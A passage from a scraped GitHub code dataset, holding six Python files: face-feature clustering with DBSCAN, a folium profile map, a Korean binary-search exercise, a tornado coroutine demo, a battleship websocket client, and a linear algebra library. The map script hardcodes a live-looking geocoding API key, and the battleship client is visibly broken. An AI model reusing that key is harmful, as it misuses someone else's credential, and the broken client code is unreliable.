in e['faces']:\n features.append(face_to_features(face))\n \n print(f' face features: {len(features)}')\n if len(features) == 0:\n print(' skipping...')\n continue\n\n if len(features) > max_features:\n np.random.shuffle(features)\n features = features[:max_features]\n print(f' limited features: {max_features}')\n \n features = np.asarray(features)\n clusterer = DBSCAN(min_samples=min_samples)\n labels = clusterer.fit_predict(features)\n unique = np.unique(labels[labels != -1])\n \n print(f' unique clusters: {len(unique)}')\n if len(unique) == 0:\n print(' skipping...')\n continue\n \n for label in unique:\n in_group = features[labels == label]\n out_group = features[labels != label]\n mean = in_group.mean(0)\n\n try:\n farthest = np.sqrt((in_group - mean) ** 2).sum(1).max()\n print(' ', label, 'farthest', round(farthest, 2))\n except ValueError:\n print(' ', label, 'farthest error')\n\n try:\n nearest = np.sqrt((out_group - mean) ** 2).sum(1).min()\n print(' ', label, 'nearest', round(nearest, 2))\n except ValueError:\n print(' ', label, 'nearest error')\n \n blocklist[str(camera_id)].append(mean)\n\nprint('saving blocklist')\nwith open('blocklist.pkl', 'wb') as f:\n pickle.dump(dict(blocklist), f)\n","repo_name":"lmccart/vibe-check","sub_path":"face/build-blocklist.py","file_name":"build-blocklist.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"27936318098","text":"# Profile data on maps\n\nimport getProfileData as gPFD\n\nimport requests\nimport json\n\nimport folium\n\n\ndef getDataSet():\n profileDataset = gPFD.profileCleanData()\n print(profileDataset.info())\n\n return profileDataset\n\n\ndef get_coordinates():\n\n # setting up return value -\n locCordList = 'error'\n\n # getting dataset for processing location coordinates -\n getProfileSet = getDataSet()\n countPerLoc = getProfileSet['Current_Location'].value_counts().to_dict()\n\n getCordData = {}\n for keys in countPerLoc:\n # Make a request to the geocoding API\n setKeys = keys+\",India\"\n api_key = '8f93dd7094b440a99d8d146c7277c592' # Replace with your API key\n api_url = f'https://api.opencagedata.com/geocode/v1/json?key={api_key}&q={setKeys}'\n #print(keys, \":\", api_url)\n response = requests.get(api_url)\n data = json.loads(response.text)\n\n # Extract the coordinates from the API response\n if data['results']:\n latitude = data['results'][0]['geometry']['lat']\n longitude = data['results'][0]['geometry']['lng']\n getCordData.update({keys: [latitude, longitude]})\n locCordList = getCordData\n\n return locCordList\n\n\ndef getMapRender():\n # Create a folium map object\n map_html = 'error'\n getLocData = get_coordinates()\n\n dataCountCord = getDataSet()\n profileCount = dataCountCord['Current_Location'].value_counts().to_dict()\n\n widthSize = 250\n\n if len(getLocData) == 1:\n setFirstKey = getLocData.keys()\n popText = profileCount[setFirstKey]\n\n mapData = folium.Map(getLocData[setFirstKey], zoom_start=5)\n folium.Marker(getLocData[setFirstKey], popup=popText, max_width=widthSize).add_to(mapData)\n map_html = mapData.get_root().render()\n\n else:\n getLocDataList = list(getLocData.items())\n indexValSet = 0\n ikey, valueSet = list(getLocDataList[indexValSet])\n\n pop_text = ikey+\":\"+str(profileCount[ikey])\n\n mapData = folium.Map(valueSet, zoom_start=5)\n folium.Marker(valueSet, popup=pop_text, max_width=widthSize).add_to(mapData)\n\n counter = 0\n for keys in getLocData:\n if counter == 0:\n counter = 
counter + 1\n\n else:\n # Add data points to the map\n pop_text = keys+\":\"+str(profileCount[keys])\n\n folium.Marker(getLocData[keys], popup=pop_text, max_width=widthSize).add_to(mapData)\n counter = counter + 1\n\n # Render the map using folium's HTML iframe\n map_html = mapData.get_root().render()\n\n return map_html\n","repo_name":"newapp2023/testApp","sub_path":"plotProfileMaps.py","file_name":"plotProfileMaps.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72959718188","text":"import sys\n\nsys.stdin = open(\"input.txt\", \"rt\")\n\n# 1번 문제. 이분검색\n\n# '''\nn, m = map(int, input().split())\na = list(map(int, input().split()))\n\n# 정렬 (선택정렬)\nfor i in range(n):\n minimum = sys.maxsize # 시스템에서 지원하는 최대 값\n idx = i # 현재 위치\n for j in range(i+1, n): # i 뒤에서 가장 작은 값 찾음\n if a[j] < minimum:\n minimum = a[j]\n idx = j\n else:\n if a[idx] < a[i]: # 뒤에서 찾는 가작 작은 값이 a[i]보다 작으면 갑 교환\n a[i], a[idx] = a[idx], a[i]\n\n# 이분검색 # log(n)번만에 찾음.\ns = 0 # 시작 인덱스\ne = n - 1 # 끝 인덱스\nwhile True:\n half = s + ((e - s) // 2) # 중간 인덱스 (기준 인덱스)\n aim = a[half] # 중간 값\n if m == aim: # 현재 인덱스가 가리키는 값과 목표값이 같은 경우\n print(half + 1) # 인덱스이기 때문에 +1\n break\n elif m < aim: # 목표값이 현대 가리키는 값보다 작으면 끝 인덱스 변경\n e = half\n elif m > aim: # 목표값이 현대 가리키는 값보다 크면 시작 인덱스 변경\n s = half\n if abs(e - s) <= 1 : # 시작인덱스와 끝 인덱스가 붙어있으면 종료\n print(\"end!!!\")\n break\n# '''\n\n\n# 해설\nn, m = map(int, input().split())\na = list(map(int, input().split()))\na.sort()\nlt = 0\nrt = n - 1\nwhile lt <= rt:\n mid = (lt + rt) // 2\n if a[mid] == m:\n print(mid + 1)\n break\n elif a[mid] > m:\n rt = mid - 1\n else:\n lt = mid + 1\n\n\n\n","repo_name":"bansakdo/Algorithm","sub_path":"inflean/Section4/Question01.py","file_name":"Question01.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16152183987","text":"\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport tornado\nfrom tornado.gen import coroutine, sleep, multi\nfrom tornado.httpclient import AsyncHTTPClient\n\n# -------------------------------------------------- use tornado -------------------------------------------------------\n\nioloop = tornado.ioloop.IOLoop()\n\ndef _stop(future):\n ioloop.stop()\n\ndef run_until_complete(future, ioloop=ioloop):\n \"\"\"Keep running untill the future is done\"\"\"\n ioloop.add_future(future, _stop) \n ioloop.start()\n\n# ---------------------------------------------------------------------------------------------------------------------\n\n@coroutine\ndef producer1():\n print('---------1')\n yield sleep(3)\n print('---------2')\n yield sleep(2)\n print('---------1')\n\n@coroutine\ndef producer2():\n print('---------4')\n yield sleep(5)\n print('---------5')\n yield sleep(5)\n print('---------6')\n\n@coroutine\ndef producer3():\n print('---------7')\n yield sleep(4)\n print('---------8')\n yield sleep(1)\n print('---------9')\n\n@coroutine\ndef producer4():\n print('---------start request')\n http_client = AsyncHTTPClient()\n res = yield http_client.fetch('http://www.npr.org')\n # res = yield http_client.fetch('test.xxx.com') # when exception happens, the exception will be eaten inside, not raise to out !?\n print('---------response ok')\n print(res)\n yield sleep(2)\n print('---------haha')\n\n@coroutine\ndef runner():\n print('--------start--------')\n producer1() \n producer2()\n producer3()\n producer4() \n # those 
coroutines have already started, but not finished, need loop to resume execute later !!\n yield sleep(8) # change this time to 1/3/5/7/10 to see differency...(when loop stoped, coroutines won't be executed any more)\n print('--------stop--------')\n\n# yield从来只是 ·暂停/挂起· 当前协程\n# 是 @coroutine装饰器 内部已经调用了 generator的send方法了,已经将其后的协程扔给loop/或者直接开启某个异步函数在后台执行,\ndef main():\n run_until_complete(runner())\n ## or\n # run_until_complete(multi([producer1(), producer2(), producer3(), producer4()]))\n pass\n\nmain()\n\n\n","repo_name":"carvenski/tornado","sub_path":"tornado实例2.py","file_name":"tornado实例2.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"2082523565","text":"from import_and_color_size_setting import *\nfrom create_ai_ship_and_buttons import *\nfrom grid import Grid\nfrom drawing import *\nfrom shooting import check_hit_or_miss\nimport json\nimport time\nfrom client_conn_win import username\nfrom client_conn_win import on_message\nfrom client_conn_win import connect_to_server\nfrom client_conn_win import on_close\nfrom client_conn_win import window\n\n\n\n\ndef enemy_shot(ws,message):\n msg_json = json.loads(message)\n if msg_json[\"type\"] == \"PLAYER_CHANGED\":\n if msg_json[\"data\"][\"name\"] == \"Player2\":\n if msg_json[\"type\"] == \"SHOT_FIRED\":\n draw_from_dotted_set(dotted_set)\n draw_hit_blocks(hit_blocks)\n \n \n\n\ndef multiplayer(ws, message):\n msg_json = json.loads(message)\n ships_creation_not_decided = True\n ships_not_created = True\n drawing = False\n game_over = False\n computer_turn = False\n start = (0, 0)\n ship_size = (0, 0)\n\n rect_for_grids = (0, 0, size[0], upper_margin + 12 * block_size)\n rect_for_messages_and_buttons = (\n 0, upper_margin + 11 * block_size, size[0], 5 * block_size)\n message_rect_for_drawing_ships = (undo_button.rect_for_draw[0] + undo_button.rect_for_draw[2], upper_margin + 11 * block_size, size[0]-(\n undo_button.rect_for_draw[0] + undo_button.rect_for_draw[2]), 4 * block_size)\n message_rect_computer = (left_margin - 2 * block_size, upper_margin +\n 11 * block_size, 14 * block_size, 4 * block_size)\n message_rect_human = (left_margin + 15 * block_size, upper_margin +\n 11 * block_size, 10 * block_size, 4 * block_size)\n\n human_ships_to_draw = []\n human_ships_set = set()\n used_blocks_for_manual_drawing = set()\n num_ships_list = [0, 0, 0, 0]\n\n screen.fill(GREY)\n computer_grid = Grid(\"ENEMY\", 0)\n human_grid = Grid(username, 15)\n\n \n\n while connect_to_server(ws, message):\n if msg_json[\"type\"] == \"GAME_PHASE_CHANGED\":\n if msg_json[\"data\"][\"phase\"] == \"SETUP\": \n while ships_creation_not_decided:\n auto_button.draw_button()\n manual_button.draw_button()\n auto_button.change_color_on_hover()\n manual_button.change_color_on_hover()\n auto_button.print_message_for_button()\n\n mouse = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n ships_creation_not_decided = False\n ships_not_created = False\n # If AUTO button is pressed - create human ships automatically\n elif event.type == pygame.MOUSEBUTTONDOWN and auto_button.rect.collidepoint(mouse):\n human = AutoShips(15)\n human_ships_to_draw = human.ships\n human_ships_working = copy.deepcopy(human.ships)\n human_ships_set = human.ships_set\n ships_creation_not_decided = False\n ships_not_created = False\n elif event.type == pygame.MOUSEBUTTONDOWN and manual_button.rect.collidepoint(mouse):\n 
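# manual placement selected: ships get drawn with the mouse in the loop below\n 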
ships_creation_not_decided = False\n\n pygame.display.update()\n screen.fill(GREY, rect_for_messages_and_buttons)\n\n\n while ships_not_created:\n screen.fill(GREY, rect_for_grids)\n computer_grid = Grid(\"Enemy\", 0)\n human_grid = Grid(username, 15)\n mouse = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if on_close():\n ships_not_created = False\n game_over = True\n pygame.QUIT\n ws.close()\n if event.type == pygame.MOUSEBUTTONDOWN:\n drawing = True\n x_start, y_start = event.pos\n start = x_start, y_start\n ship_size = (0, 0)\n if drawing and event.type == pygame.MOUSEMOTION:\n x_end, y_end = event.pos\n end = x_end, y_end\n ship_size = x_end - x_start, y_end - y_start\n elif drawing and event.type == pygame.MOUSEBUTTONUP:\n x_end, y_end = event.pos\n drawing = False\n ship_size = (0, 0)\n start_block = ((x_start - left_margin) // block_size + 1,\n (y_start - upper_margin) // block_size + 1)\n end_block = ((x_end - left_margin) // block_size + 1,\n (y_end - upper_margin) // block_size + 1)\n if start_block > end_block:\n start_block, end_block = end_block, start_block\n temp_ship = []\n if 15 < start_block[0] < 26 and 0 < start_block[1] < 11 and 15 < end_block[0] < 26 and 0 < end_block[1] < 11:\n screen.fill(GREY, message_rect_for_drawing_ships)\n if start_block[0] == end_block[0] and (end_block[1] - start_block[1]) < 4:\n for block in range(start_block[1], end_block[1]+1):\n temp_ship.append((start_block[0], block))\n elif start_block[1] == end_block[1] and (end_block[0] - start_block[0]) < 4:\n for block in range(start_block[0], end_block[0]+1):\n temp_ship.append((block, start_block[1]))\n else:\n show_message_at_rect_center(\n \"SHIP IS TOO LARGE\", message_rect_for_drawing_ships)\n else:\n show_message_at_rect_center(\n \"SHIP IS BEYOND YOUR GRID\", message_rect_for_drawing_ships)\n if temp_ship:\n temp_ship_set = set(temp_ship)\n if ship_is_valid(temp_ship_set, used_blocks_for_manual_drawing):\n if check_ships_numbers(temp_ship, num_ships_list):\n num_ships_list[len(temp_ship) - 1] += 1\n human_ships_to_draw.append(temp_ship)\n human_ships_set |= temp_ship_set\n update_used_blocks(\n temp_ship, used_blocks_for_manual_drawing.add)\n data = {\n \"type\": \"PLACE_SHIP\",\n \"data\": {\n \"x\": x_start,\n \"y\": y_start,\n \"length\": ship_size,\n \"direction\": ship_size\n }\n }\n ws.send(json.dumps(data))\n i += 1\n else:\n show_message_at_rect_center(\n f\"There already are enough of {len(temp_ship)} ships!\", message_rect_for_drawing_ships)\n else:\n show_message_at_rect_center(\n \"SHIPS ARE TOUCHING\", message_rect_for_drawing_ships)\n if len(human_ships_to_draw) == 10:\n ships_not_created = False\n human_ships_working = copy.deepcopy(human_ships_to_draw)\n screen.fill(GREY, rect_for_messages_and_buttons)\n pygame.draw.rect(screen, GREEN, (start, ship_size), 3)\n draw_ships(human_ships_to_draw)\n pygame.display.update()\n\n while not game_over:\n if msg_json[\"type\"] == \"GAME_PHASE_CHANGED\":\n if msg_json[\"data\"][\"phase\"] == \"IN_PROGRESS\":\n draw_ships(human_ships_to_draw)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n on_close()\n ws.close()\n if msg_json[\"type\"] == \"PLAYER_CHANGED\":\n if msg_json[\"data\"][\"name\"] == \"Player1\":\n while msg_json[\"data\"][\"name\"] == \"Player1\":\n show_message_at_rect_center(\"GAME STARTED! 
YOUR MOVE!\", message_rect_computer)\n if event.type == pygame.MOUSEBUTTONDOWN:\n x, y = event.pos\n if (left_margin < x < left_margin + 10 * block_size) and (\n upper_margin < y < upper_margin + 10 * block_size):\n fired_block = ((x - left_margin) // block_size + 1,\n (y - upper_margin) // block_size + 1)\n \n data = {\n \"type\": \"FIRE_SHOT\",\n \"data\": {\n \"x\": (x - left_margin) // block_size + 1,\n \"y\": (y - upper_margin) // block_size + 1,\n }\n }\n ws.send(json.dumps(data))\n time.sleep(2.5)\n \n if msg_json[\"data\"] == \"SHOT_FIRED\":\n if msg_json[\"type\"][\"result\"] == \"MISS\":\n draw_from_dotted_set(dotted_set)\n if msg_json[\"type\"] == \"PLAYER_CHANGED\":\n if msg_json[\"data\"][\"name\"] == \"Player2\":\n enemy_shot()\n if msg_json[\"type\"] == \"SHOT_FIRED\":\n if msg_json[\"data\"][\"result\"] == \"HIT\":\n draw_hit_blocks(hit_blocks)\n screen.fill(GREY, message_rect_computer)\n show_message_at_rect_center(\n f\"Your last shot: {LETTERS[fired_block[0]-1] + str(fired_block[1])}\", message_rect_computer, color=BLACK)\n\n else:\n show_message_at_rect_center(\"Your shot is outside of grid\", message_rect_computer)\n\n if not human_ships_set:\n show_message_at_rect_center(\n \"YOU LOST!\", (0, 0, size[0], size[1]), game_over_font)\n game_over = True\n pygame.display.update()\n\n while on_close():\n\n screen.fill(LIGHT_GRAY, rect_for_messages_and_buttons)\n play_again_button.draw_button()\n play_again_button.print_message_for_button()\n play_again_button.change_color_on_hover()\n quit_game_button.draw_button()\n quit_game_button.change_color_on_hover()\n\n mouse = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN and play_again_button.rect.collidepoint(mouse):\n window.mainloop()\n elif event.type == pygame.MOUSEBUTTONDOWN and quit_game_button.rect.collidepoint(mouse):\n ws.close()\n pygame.quit()\n sys.exit()\n pygame.display.update()\n\n\nmultiplayer()\n","repo_name":"07Hollow/Battleship_with_Multiplayer","sub_path":"multiplayer.py","file_name":"multiplayer.py","file_ext":"py","file_size_in_byte":13174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20222484857","text":"\"\"\"\nProvides an assortment of more advanced linear algebra tools to work\n with `Vector` and `Matrix` objects.\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom fractions import Fraction\nfrom math import sqrt, acos\nfrom typing import Iterable, Literal, overload\nfrom functools import reduce\nfrom operator import mul as mul_operator\n\nfrom ._errors import (\n DimensionMismatchError,\n LinearDependenceError,\n RectangularMatrixError,\n)\nfrom ._matrix import Matrix\nfrom ._vector import Vector\n\n__all__ = (\n \"cross\",\n \"determinant\",\n \"distance\",\n \"homogenous\",\n \"identity\",\n \"inverse\",\n \"join_vectors\",\n \"laplace_expansion\",\n \"limit_denominator\",\n \"magnitude\",\n \"matrix_power\",\n \"normalize\",\n \"orthogonalize\",\n \"rank\",\n \"row_reduce\",\n \"transpose\",\n \"split_vectors\",\n)\n\n\ndef angle(\n direction_a: Vector,\n direction_b: Vector,\n) -> float:\n \"\"\"\n Calculates the angle between two vectors in radians.\n\n Arguments\n - direction_a: The \"starting\" direction.\n - direction_b: The \"ending\" direction.\n\n Possible Errors\n - DimensionMismatchError: If `direction_a` and `direction_b` do not\n have the same length.\n\n Notes\n - May introduce floating point errors.\n 
\"\"\"\n if len(direction_a) != len(direction_b):\n raise DimensionMismatchError(\n f\"'a' length ({len(direction_a)}) \"\n f\"does not equal 'b' length ({len(direction_b)})\"\n )\n return acos(\n (direction_a @ direction_b)\n / (magnitude(direction_a) * magnitude(direction_b))\n )\n\n\ndef cross(\n *vectors: Vector,\n) -> Vector:\n \"\"\"\n Calculates a vector that is orthogonal to every given vector, in the\n case of exactly two 3-dimensional inputs, this is the cross\n product.\n\n Arguments\n - *vectors: The collection of vectors to cross (the number of\n vectors) given must be one less than the length of each vector.\n\n Possible Errors\n - ValueError: If the vectors given for `vectors` are not all the\n same length _n_, or if not exactly _n_-1 vectors were given.\n \"\"\"\n if len(vectors) <= 0:\n raise ValueError(\"exactly n-1 n-dimensional vectors must be given\")\n v_len = len(vectors[0])\n for vector in vectors:\n if len(vector) != v_len:\n raise DimensionMismatchError(\n \"all given vectors must have the same length\"\n )\n if len(vectors) != v_len - 1:\n raise ValueError(\"exactly n-1 n-dimensional vectors must be given\")\n matrix = join_vectors(homogenous(v_len, 1), *vectors, orientation=\"row\")\n return Vector(\n coefficient * determinant(matrix)\n for matrix, coefficient in laplace_expansion(matrix)\n )\n\n\ndef determinant(\n matrix: Matrix,\n) -> Fraction:\n \"\"\"\n Calculates the determinant of a matrix, which represents the scaling\n factor a matrix would apply when acting as a linear\n transformation.\n\n Arguments\n - matrix: The matrix for which the determinant is to be calculated.\n\n Possible Errors\n - RectangularMatrixError: If `matrix` is not a square matrix.\n \"\"\"\n if matrix.shape[0] != matrix.shape[1]:\n raise RectangularMatrixError(\n \"Determinants are only defined for square \"\n \"matrices, this matrix has a shape of \"\n f\"({matrix.shape[0]},{matrix.shape[1]})\"\n )\n if matrix.shape == (1, 1):\n return matrix[0, 0]\n if matrix.shape == (2, 2):\n return (matrix[0, 0] * matrix[1, 1]) - (matrix[1, 0] * matrix[0, 1])\n if matrix.shape == (3, 3):\n return (\n (matrix[0, 0] * matrix[1, 1] * matrix[2, 2])\n + (matrix[0, 1] * matrix[1, 2] * matrix[2, 0])\n + (matrix[0, 2] * matrix[1, 0] * matrix[2, 1])\n - (matrix[0, 2] * matrix[1, 1] * matrix[2, 0])\n - (matrix[0, 1] * matrix[1, 0] * matrix[2, 2])\n - (matrix[0, 0] * matrix[1, 2] * matrix[2, 1])\n )\n upper, sign = _ref(matrix)\n return reduce(mul_operator, upper.diagonal, Fraction(sign))\n\n\ndef distance(\n point_a: Vector,\n point_b: Vector,\n) -> float:\n \"\"\"\n Calculates the straight-line distance between two _n_-dimensional\n points given by vectors.\n\n Arguments\n - point_a: The \"starting\" point.\n - point_b: The \"ending\" point.\n\n Possible Errors\n - DimensionMismatchError: If `point_a` and `point_b` do not have the\n same length.\n\n Notes\n - May introduce floating point errors.\n \"\"\"\n if len(point_a) != len(point_b):\n raise DimensionMismatchError(\n f\"'a' length ({len(point_a)}) \"\n f\"does not equal 'b' length ({len(point_b)})\"\n )\n difference = point_a - point_b\n return sqrt(difference @ difference)\n\n\n@overload\ndef homogenous(\n shape: tuple[int, int],\n value: float | Fraction = 0,\n) -> Matrix:\n ...\n\n\n@overload\ndef homogenous(\n shape: int,\n value: float | Fraction = 0,\n) -> Vector:\n ...\n\n\ndef homogenous(\n shape: tuple[int, int] | int,\n value: float | Fraction = 0,\n) -> Vector | Matrix:\n \"\"\"\n Constructor that creates a matrix or vector of a given 
shape which\n has all elements equal to one another.\n\n Arguments\n - shape: The row-column shape of the desired matrix, or length of\n the desired vector.\n - value: The value with which to fill the matrix.\n Optional, defaults to 0.\n \"\"\"\n if isinstance(shape, tuple):\n return Matrix(\n (value for _ in range(shape[1])) for _ in range(shape[0])\n )\n else: # if isinstance(shape, int):\n return Vector(value for _ in range(shape))\n\n\ndef identity(\n side_length: int,\n) -> Matrix:\n \"\"\"\n Creates and returns a square identity matrix.\n\n Arguments\n - side_length: The side-length of the desired matrix.\n\n Possible Errors\n - ValueError: If `side_length` is 0 (or less).\n \"\"\"\n if side_length <= 0:\n raise ValueError(\"The size of an identity matrix must be at least 1\")\n return Matrix(\n (1 if i == j else 0 for i in range(side_length))\n for j in range(side_length)\n )\n\n\ndef inverse(\n matrix: Matrix,\n) -> Matrix:\n \"\"\"\n Inverts a matrix with respect to matrix multiplication.\n\n Arguments\n - matrix: The matrix to invert.\n\n Possible Errors\n - RectangularMatrixError: If `matrix` is not a square matrix.\n - LinearDependenceError: If `matrix` is non-invertible.\n \"\"\"\n side_len = matrix.shape[0]\n if side_len != matrix.shape[1]:\n raise RectangularMatrixError(\n \"inversions are only defined for square \"\n \"matrices, this matrix has a shape of \"\n f\"({matrix.shape[0]},{matrix.shape[1]})\"\n )\n reduction = row_reduce(matrix | identity(side_len))\n inversion = reduction[:, side_len:]\n for i in reduction.diagonal:\n if i != Fraction(1):\n raise LinearDependenceError(\n \"cannot invert linearly dependent matrices\"\n )\n return inversion\n\n\ndef join_vectors(\n *vectors: Vector,\n orientation: Literal[\"col\", \"row\"] = \"col\",\n) -> Matrix:\n \"\"\"\n Concatenates _m_ vectors of dimension _n_ into either an _m_ by _n_\n matrix, or an _n_ by _m_ matrix.\n\n Arguments\n - *vectors: The vectors to join.\n - orientation: Whether to interpret the given vectors as columns, or\n as rows of the desired matrix.\n Optional, defaults to 'col'.\n\n Possible Errors\n - ValueError: If no vectors were given.\n - DimensionMismatchError: If not all of the given vectors have the\n same length.\n \"\"\"\n if len(vectors) <= 0:\n raise ValueError(\"at least one vector must be given\")\n v_len = len(vectors[0])\n for vector in vectors:\n if len(vector) != v_len:\n raise DimensionMismatchError(\n \"all vectors must have the same length to be \"\n \"joined into a matrix\"\n )\n if orientation == \"col\":\n return Matrix(row for row in zip(*vectors))\n else: # if orientation == \"row\":\n return Matrix(vectors)\n\n\ndef laplace_expansion(\n matrix: Matrix,\n) -> Iterable[tuple[Matrix, Fraction]]:\n \"\"\"\n Lazily yields the cofactor expansion of a matrix along its first row\n as a matrix-coefficient tuple.\n\n Arguments\n - matrix: The matrix to expand.\n\n Possible Errors\n - RectangularMatrixError: If `matrix` is not a square matrix.\n \"\"\"\n if matrix.shape[0] != matrix.shape[1]:\n raise RectangularMatrixError(\n \"Laplace expansions are only defined for square \"\n \"matrices, this matrix has a shape of \"\n f\"({matrix.shape[0]},{matrix.shape[1]})\"\n )\n if matrix.shape[0] < 2:\n raise ValueError(\n \"matrices must not be smaller than (2,2) for Laplace expansion\"\n )\n for i in range(matrix.shape[1]):\n yield (\n Matrix(\n (item for c, item in enumerate(row) if c != i)\n for r, row in enumerate(matrix)\n if r != 0\n ),\n (1 if i % 2 == 0 else -1) * matrix[0, i],\n 
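# cofactor coefficient: the sign alternates (+, -, +, ...) along the first row\n 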
)\n\n\n@overload\ndef limit_denominator(\n arg: Vector,\n max_denominator: int,\n) -> Vector:\n ...\n\n\n@overload\ndef limit_denominator(\n arg: Matrix,\n max_denominator: int,\n) -> Matrix:\n ...\n\n\ndef limit_denominator(\n arg: Vector | Matrix,\n max_denominator: int,\n) -> Vector | Matrix:\n \"\"\"\n Creates a new instance of the argument with all fraction\n denominators set to some maximum amount.\n\n Arguments\n - arg: The matrix or vector to operate on.\n - max_denominator: The highest possible denominator (actual may be\n lower).\n\n Possible Errors\n - ZeroDivisionError: If max_denominator is 0.\n \"\"\"\n\n if max_denominator == 0:\n raise ZeroDivisionError(\n \"maximum denominator must be a nonzero positive integer\"\n )\n if isinstance(arg, Matrix):\n return Matrix(\n (item.limit_denominator(max_denominator) for item in row)\n for row in arg\n )\n else: # if isinstance(arg, Vector):\n return Vector(item.limit_denominator(max_denominator) for item in arg)\n\n\ndef magnitude(\n vector: Vector,\n) -> float:\n \"\"\"\n Calculates the magnitude (length) of a given vector.\n\n Arguments\n - vector: The vector for which the magnitude must be calculated.\n\n Notes\n - May introduce floating point errors.\n \"\"\"\n return sqrt(sum((n * n for n in vector)))\n\n\ndef matrix_power(\n matrix: Matrix,\n power: int,\n) -> Matrix:\n \"\"\"\n Calculates the given integer power of a matrix by repeated matrix\n multiplication.\n\n Arguments\n - matrix: The matrix to raise to the given power.\n - power: The power to raise the given matrix to.\n\n Possible Errors\n - RectangularMatrixError: If `matrix` is not a square matrix.\n \"\"\"\n side_len = matrix.shape[0]\n if not side_len == matrix.shape[1]:\n raise RectangularMatrixError(\n \"only square matrices may be raised to a power\"\n )\n\n def fast_pow(identity_: Matrix, matrix_: Matrix, power_: int) -> Matrix:\n if power_ == 0:\n return identity_\n half_power, remainder = divmod(power_, 2)\n result = fast_pow(identity_, matrix_, half_power)\n result @= result\n return matrix_ @ result if remainder != 0 else result\n\n identity_mat = identity(side_len)\n return fast_pow(identity_mat, matrix, power)\n\n\ndef normalize(\n vector: Vector,\n) -> Vector:\n \"\"\"\n Calculates an approximately normal vector.\n\n Arguments\n - vector: The vector to normalize.\n\n Possible Errors\n - ZeroDivisionError: If the magnitude of the given vector is 0.\n\n Notes\n - An exact normal cannot be calculated since normalization involves\n scaling by a possibly irrational factor. 
This may introduce\n floating point errors.\n \"\"\"\n mag = magnitude(vector)\n if mag == 0:\n raise ZeroDivisionError(\n \"vectors with magnitude 0 cannot be normalized\"\n )\n else:\n return Vector(n / mag for n in vector)\n\n\ndef orthogonalize(\n *vectors: Vector,\n) -> list[Vector]:\n \"\"\"\n Using the Gram-Schmidt process, creates an orthogonal basis from a\n set of vectors.\n\n Arguments\n - *vectors: The set of vectors to use as a non-orthogonal basis.\n\n Possible Errors\n - ValueError: If not all given vectors have the same length, or\n if not exactly *n* vectors are given, where *n* represents the\n length of each vector.\n - LinearDependenceError: If the given vectors cannot form a linearly\n independent basis.\n\n Notes\n - The returned vectors are not normalized, they must be manually\n normalized if an orthonormal basis is sought.\n \"\"\"\n\n # Video reference I used:\n # https://www.youtube.com/watch?v=zHbfZWZJTGc\n\n if len(vectors) <= 0:\n raise ValueError(\"exactly n n-dimensional vectors must be given\")\n v_len = len(vectors[0])\n for vector in vectors:\n if len(vector) != v_len:\n raise DimensionMismatchError(\n \"all given vectors must have the same length\"\n )\n if len(vectors) != v_len:\n raise ValueError(\"exactly n n-dimensional vectors must be given\")\n u_vectors: list[Vector] = []\n try:\n for k in range(len(vectors)):\n u_vectors.append(vectors[k])\n u_vectors[k] -= sum(\n (\n (\n u_vectors[i]\n * (vectors[k] @ u_vectors[i])\n / (u_vectors[i] @ u_vectors[i])\n )\n for i in range(k)\n ),\n start=homogenous(v_len, 0),\n )\n except ZeroDivisionError:\n raise LinearDependenceError(\n \"cannot orthogonalize linearly dependent vectors\"\n )\n\n return u_vectors\n\n\ndef rank(\n matrix: Matrix,\n) -> int:\n \"\"\"\n Calculates the rank of a given matrix.\n\n Arguments\n - matrix: The matrix the rank is to be calculated from.\n \"\"\"\n matrix_ref = row_reduce(matrix, \"ref\")\n rank_count = 0\n for i in range(min(matrix_ref.shape)):\n if matrix_ref[i, i] == 0:\n break\n else:\n rank_count += 1\n return rank_count\n\n\ndef row_reduce(\n matrix: Matrix,\n form: Literal[\"rref\", \"ref\"] = \"rref\",\n) -> Matrix:\n \"\"\"\n Computes a row-echelon or reduced row-echelon form matrix by row\n reduction.\n\n Arguments\n - matrix: The matrix to row-reduce.\n - form: Whether to compute the reduced row-echelon form by\n Gauss-Jordan elimination, or compute a non-reduced row-echelon\n form by simple Gaussian elimination.\n Optional, defaults to 'rref'.\n \"\"\"\n if form == \"rref\":\n return _rref(matrix)\n else: # if form == \"ref\":\n return _ref(matrix)[0]\n\n\ndef split_vectors(\n matrix: Matrix,\n orientation: Literal[\"col\", \"row\"] = \"col\",\n) -> Iterable[Vector]:\n \"\"\"\n Lazily gets each row or column from a matrix as a vector.\n\n Arguments\n - matrix: The matrix to separate into vectors.\n - orientation: Whether to interpret the given matrix as a collection\n of columns, or a list of rows.\n Optional, defaults to 'col'.\n \"\"\"\n if orientation == \"col\":\n return (Vector(col) for col in zip(*iter(matrix)))\n else: # if orientation == \"row\":\n return (Vector(col) for col in matrix)\n\n\ndef transpose(\n matrix: Matrix,\n) -> Matrix:\n \"\"\"\n Calculate the transpose of a given matrix.\n\n Arguments\n - matrix: The matrix to transpose.\n \"\"\"\n return Matrix(\n (matrix[i, j] for i in range(matrix.shape[0]))\n for j in range(matrix.shape[1])\n )\n\n\n# PRIVATE/PROTECTED METHODS\n\n\ndef _ref(\n matrix: Matrix,\n) -> tuple[Matrix, int]:\n \"\"\"\n 
